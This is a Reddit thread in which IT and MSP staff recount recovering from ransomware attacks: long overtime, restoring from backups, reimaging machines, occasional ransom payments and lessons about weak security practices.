Shaded_Newt@reddit
I've had 3 while working at an MSP. One instance we managed to isolate to a single workstation before it spread to others; one was someone's personal computer they brought into our office.
The 3rd was not so easy. The client had no security in place, and many shared passwords/user accounts and email addresses.
We had them running in Datto's disaster recovery cloud within a week from a known good backup which helped tremendously.
It took 3 months to clean up with every week being anywhere from 60 to 80 hours. At the end of the incident we had rebuilt their entire IT infrastructure from the ground up, and rebuilt all of their VMs.
cidknee1@reddit (OP)
Damn. We have had 4 guys at 14 hours a day. And me for 10 hours yesterday and 4 today. It’s gonna be a big bill, I’m sure.
Shaded_Newt@reddit
I'm a bit jealous lol, the major one was a solo project, all of our other engineers were tied up for those 3 months on other tasks
cidknee1@reddit (OP)
Having a good team is the best. I owe them many beers.
Seedy64@reddit
Backup, backup, backup. Physical backup rotating 3 drives weekly, or whatever the pain threshold is for the customer. 2 of the drives kept in 2 separate off-site locations, air-gapped. At most, you'll lose a couple of weeks' worth of data. Better than paying millions.
cidknee1@reddit (OP)
We do on-site backups with nightly offsite replication. We went back a week as per the SOC monitoring.
Rawme9@reddit
Welcome to the club. Got hit over a week ago, I'm finally getting a day off today. Not fully recovered but looking okay
cidknee1@reddit (OP)
This is my 3rd, not my first rodeo.
Delta31_Heavy@reddit
Had a five day virus outbreak once. Every time we thought we got it done it popped up again. Over 110 hours put in that week from Monday to Saturday with some 30 hour days thrown in
JustDandy07@reddit
We took over a client and hadn't even had time to really look at their network to put together a real plan on what to do. The hackers must have been in for a few weeks/months waiting for the right moment. They got ransomware'd and essentially had no backups thanks to the cowboy who was doing their IT for 20 years before us. RDP was wide open to the internet. The password to the default domain administrator account (literally the account called Administrator) was just the name of the company, all lowercase.
We ended up just paying the ransom and luckily the hackers were legit and gave us real keys to decrypt everything. I'll never forget my boss having to walk through the streets of this major metropolitan city with $5000 in cash in his pocket to go buy 5 Bitcoins at a Bitcoin ATM at some shady bodega. It would have taken a week or two to get the bitcoins via any other method back then (10 years ago?). It was wild.
I even called the FBI. They just took my info and didn't have much else to offer. They called back 5 or 6 months later but I wasn't in the office. They left a message. They never called back. I never called them. Why waste my time?
Worst experience of my 17-year career and it changed how I approach everything.
SteveAngelis@reddit
Yep. Longest 7 days of my life with the absolute least amount of sleep. And that includes having a newborn spend 12 days in the NICU (wasn't too sick, but mostly precautionary) and sleeping on a child-size rubber mat in the hospital.
TotallyNotIT@reddit
I've led 12 and it sucks shit every time. 7 of those we did initial containment and were backing up an insurance company's remediation team
killyourpc@reddit
2.5 yrs ago, out of Russia, lost every PC, every server, all VMware infrastructure. 280+ hrs overtime first 6 weeks. Was about 1.5 - 2 years of full recovery. Hit backups first, no immutable. Lots of lessons learned. Lots of burnout. Watch yourself, and don't let the job get ahead of your health.
bbqwatermelon@reddit
Better question is, ever think we are in the wrong business?
Ewalk@reddit
I worked in a medical clinic and they called into our PA system to announce their ransom.
That was wild.
I left soon after since it was like my second week and the board was already telling us we had to use cheaper remediation solutions. Saw that shitshow a mile away.
caffeine-junkie@reddit
Had to twice. We just identified the PC(s), pulled them, reimaged on a new hard drive, and kept the old ones around just in case. Then for the shares that were even partially affected, we deleted them and restored from backups. Sure, there was some complaining from the manager of those who had their computers pulled, as they had important information on them, but then we just retorted with: why wasn't it saved on the server, which is backed up, if it was so critical?
One time only about a day's worth of work was lost. The other it was a couple of weeks, as it wasn't noticed for a long while; it was a seldom-used share that only a few people had access to, and the encryption was slow, probably as an attempt to exceed restore points.
A separate parallel activity was done by security to identify the ingress point. Both times it was email.
EntireFishing@reddit
I think I paid an MSP's first ransomware ransom in 2012 or so. Should have bought some bitcoin then myself. Would have been set for life off £500. Can't believe I missed the easiest way to be a millionaire.
BeagleBackRibs@reddit
I don't remember the year, but Bitcoin was $400 and we had to buy 1 to get the decryption key. They had a $100 million company on its knees. I didn't even know what Bitcoin was. I had to go through some shady sites that moved money from the Philippines to Mexico. It wasn't easy to buy Bitcoin instantly back then.
EntireFishing@reddit
Yep exactly what I had to do. It was for a Premier League football club in the UK. My colleague Lee knew how to do it and he saved the day. I remember him saying should we buy some coins? Doh
newton302@reddit
Happened to our small org around 2013. Called my boss on the weekend and she said just pay ($300). We did and we got everything back. The way we paid was to buy a money card at Walgreens then give the hoods the number. I went home thinking gee this "anonymous currency" is a great idea. Bitcoin was really cheap then, and I was going to buy 1000. But the provider wanted me to send in my social security number just like a regular brokerage but I was so traumatized by the ransomware thing that I was too scared.
THEoMADoPROPHET@reddit
I’ve been there too. One of the worst parts is the uncertainty about whether the malware has been completely removed. I usually go for a complete wipe and fresh install to be safe. At least it’s a good excuse to upgrade the hardware!
cidknee1@reddit (OP)
Luckily we did that a couple months before the attack. All brand-new machines and such. We were in the process of getting a new server and getting rid of an old 2012 machine. Let's just say it's just getting removed and scrapped.
Obi-Juan-K-Nobi@reddit
That Crowdstrike hit was the worst! /s
illicITparameters@reddit
Which time?
Thank fuck the 3 times I’ve had to do it, it wasn’t my fault 🤣🤣
Thankfully only 1 time was there substantial data loss, but it didn’t impact revenue for that place, which is all the execs cared about. It did make other people’s jobs harder for up to 3yrs after the fact, though.
FarJeweler9798@reddit
Once. I kinda enjoyed it because you were only on that task all the time; no one stopped you in Teams to do anything else. Cleaning/checking about 4k computers and restoring hundreds and hundreds of servers. Backups, well, there were some... Lots of the servers we just did from clean, as they were running on an old OS.
doobjank@reddit
I worked for a nonprofit as IT for a while and a bookkeeper got ransomware. I just had to get Microsoft to roll them back. Took a few weeks but wasn't too bad
LurkerWiZard@reddit
Went through it about 5 years ago. It's terrible. My backups were good, as were my snapshots. Everything was hosed.
A week to get virtual environment back online and VIP systems/services restored. End of second week everything was back. A month in and quirks resolved. As others stated, slept at the office. Somebody kept me supplied with protein bars and caffeine.
It ain't for the weak, that's for sure. 😬
shinyviper@reddit
DFIR consultant here. Had three this summer alone. Ransomware is definitely picking up as cybersecurity insurance becomes the norm and threat actors are more likely to get paid. And yes, both sides, investigation AND remediation, suck.
cidknee1@reddit (OP)
Yeah, it sucks. And it's becoming very, very common here for insurance companies to require it, and specific things on the network like patch level, specific OS, lots of stuff.
budlight2k@reddit
3 times now. I'm getting quite good at it.
One of them wiped out a national company and was absolutely due to complacency. I got questioned because I told them in detail what could happen before it did.
mustang__1@reddit
Twice. Once was just a file share, restored the backup and moved on.
The other.... The other used our old MSP, that we barely used for break-fix, as a vector. They had a compromised Kaseya server (about a year before the big one) and hit thousands of endpoints the MSP had touched. I had some pet workstations backed up.... to an external drive.... that just so happened to be plugged in.
The MSP managed our Datto backups. I started calling at 7am when I was notified we were hit. By 9am I still hadn't heard back or had an answer after calling on the half hour. So I drove over and found out they were the vector.... and got my backups rolling. But they kept restoring the wrong server images.
Additional complications were I couldn't find a w7 64b disk and at the time was still avoiding w10.
By Wednesday I stopped going home and just slept at the office on couches. We were functioning again by Friday. Took me another month to get all the little shit sorted.
RustyU@reddit
I've only had to deal with it once. It wasn't a huge company and their backups were solid so it wasn't that big a job, just annoying.
WYOutdoorGuy@reddit
We were just under two weeks total time to restore back to functioning. About a month before we were "normal" ops again. Still cleaning up bits and closing missed loopholes as I find them.
Jayhawker_Pilot@reddit
Just saying ransomware and my PTSD is triggered. If it happens again where I am, I am retiring on the spot. Once was more than enough.
cidknee1@reddit (OP)
I had one, larger client. 150-ish machines. All infected. Servers hadn't been patched in 4 years (management wouldn't let them, as "it's good enough"). They paid and got it back (1.3 mil), and 3 days after we got it back up and running some idiot brings his laptop in and bam, reinfects everything.
So we fixed it again... wipe, reload, etc. 2 weeks later... same thing. The CEO called everyone personally and told them to bring their laptop in right now or they are fired. Let's just say they take it pretty seriously now. I know one of the IT guys there and they get everything they need to keep the company going. Upgrades, maint, etc.
Apotrox@reddit
Took 5 days in >12h shifts to get everything back up and running for people to work again. Rebuilt everything from scratch on new HW, which was due anyway. Took weeks to migrate the EDB from on-prem Exchange 2010 to Exchange 2019. Ended up just using third-party software to export to PST. A character-building experience, to say the least.
Didn't bother contacting the group nor did we have insurance. Only reported it to the police for documentation.
cidknee1@reddit (OP)
Yeah, luckily our SOC notified us and they tried to isolate the network, but only did one server. I went in after, said WTF, and disabled the NICs on the hosts. That killed it in its tracks. Our backup server wasn't affected, and we have 365, so that's an easy fix.
Thank god they just upgraded 90% of the computers from old 4th-gen i7 mechanicals to 12th-gen i7 and i9 with 64GB RAM on NVMe a couple months ago. Otherwise I'd still be there. Now it's just the little stuff like setting up the programs for the CAM machines etc. Still a pain, but the end is in sight.
Apotrox@reddit
Godspeed to you friend.
abyssea@reddit
Yeah, multiple times. Just PXE boot and reimage the machine. Everything should be saved on network shares/cloud services, not on the endpoints.
fishingforbeerstoday@reddit
Not quite there for the event, but I started my current job 1 month after they suffered an attack. Everything was built from the ground up, which served me in the sense that I was still getting used to the environment as a new employee.